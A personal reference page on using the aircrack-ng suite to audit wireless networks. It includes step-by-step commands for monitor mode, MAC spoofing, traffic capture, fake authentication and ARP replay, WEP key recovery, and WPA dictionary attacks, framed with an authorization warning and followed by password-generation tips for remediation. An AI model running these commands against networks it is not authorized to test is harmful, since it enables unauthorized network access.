Andrew Mercer
on this page

Personal reference notes, kept close to the original form. For structured guidance start with the linux-networking wireless page; this page is the aircrack-ng-specific detail.

Only run these tools against networks and devices you own or are explicitly authorized to test. Accessing a network you don't own or don't have written permission to test is illegal in most jurisdictions regardless of whether the encryption is weak. WEP itself has been considered broken and unfit for use since the mid-2000s — its presence here is for auditing legacy/IoT gear and for understanding why WPA2/WPA3 exist, not as a how-to for accessing other people's networks.

The aircrack-ng suite

  • aircrack-ng — the umbrella project: packet capture, WEP/WPA-PSK key recovery, and supporting tools (airmon-ng, airodump-ng, aireplay-ng, airbase-ng).
  • Related: kismet (passive wireless/RF detection and mapping), wavemon (ncurses signal monitor for a single link).

Put the interface into monitor mode

airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0     # randomize the MAC before testing
airmon-ng start wlan0

Survey nearby networks

airodump-ng wlan0

Output includes BSSID (AP MAC), encryption type, and channel for each visible network — this is how you'd confirm a device of your own is still (or no longer) running WEP before doing anything further.

Capture traffic on a specific network

airodump-ng -c <channel> -w <capture-prefix> --bssid <AP-MAC> wlan0

In a second terminal, generate the traffic needed for a WEP key-recovery attack (fake authentication, then ARP-replay to generate enough IVs):

aireplay-ng -1 0 -a <AP-MAC> -h 00:11:22:33:44:55 -e <ESSID> wlan0    # fake auth
aireplay-ng -3 -b <AP-MAC> -h 00:11:22:33:44:55 wlan0                 # ARP replay to generate traffic

Once the capture has a healthy number of data packets (tens of thousands for WEP):

aircrack-ng -b <AP-MAC> <capture-prefix>.cap

For a WPA/WPA2-PSK network the same airodump-ng capture (targeting a handshake instead of IVs) is fed to aircrack-ng -w wordlist.txt — a dictionary/wordlist attack rather than the WEP statistical attack, since WPA doesn't have WEP's key-recovery weakness.

Random password / key generation

For setting a strong new key/passphrase on your own gear (the actual fix, once you've confirmed a device is on WEP or a weak WPA passphrase):

pwgen -s -y -n 40 1                                    # 40-char random password with symbols
openssl rand -base64 32
head -c20 /dev/urandom | tr -dc _A-Z-a-z-0-9

Or use random.org's password generator for a non-local source of randomness. See gnupg and pass for storing the result properly afterward, rather than a text file.